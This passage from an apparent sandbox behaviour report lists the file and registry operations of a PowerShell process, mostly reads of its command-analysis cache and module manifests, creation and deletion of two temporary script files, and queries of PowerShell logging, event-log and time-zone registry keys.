1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 5, size_out = 5 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 4096, size_out = 2818 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | size = 4096, size_out = 2384 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | size = 688, size_out = 0 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 664 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | size = 4096, size_out = 1815 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 1528 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 520, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 737 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28 | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | size = 4096, size_out = 2389 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | size = 1 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 | size = 1 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096 |
|
4 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 3546 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18 | size = 1187 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096 |
|
4 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 3546 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 4096 |
|
2 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | size = 2823 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096 |
|
4 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 3546 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | size = 1815 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096 |
|
4 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 3546 |
|
1 | |
| Delete | C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | - |
|
1 | |
| Delete | C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 | - |
|
1 |
Registry (307)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{5037b0a0-3a31-5cd2-ff19-103e9f160a74} | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
17 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
5 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
7 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
7 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN | value_name = ServiceStackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN | value_name = ServiceStackVersion, data = 3.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = TZI, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
17 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
7 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
